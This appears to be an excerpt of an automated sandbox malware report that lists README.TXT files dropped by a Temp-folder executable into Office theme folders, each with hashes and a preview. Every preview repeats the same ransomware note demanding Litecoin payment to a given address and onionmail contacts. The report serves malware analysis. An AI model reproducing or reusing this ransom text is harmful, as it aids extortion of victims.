                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\BLENDS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\BLUECALM\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\BLUEPRNT\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\BOLDSTRI\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\BREEZE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\CANYON\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\CAPSULES\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\CASCADE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\COMPASS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\CONCRETE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\DEEPBLUE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\ECHO\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\ECLIPSE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\EDGE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\EVRGREEN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
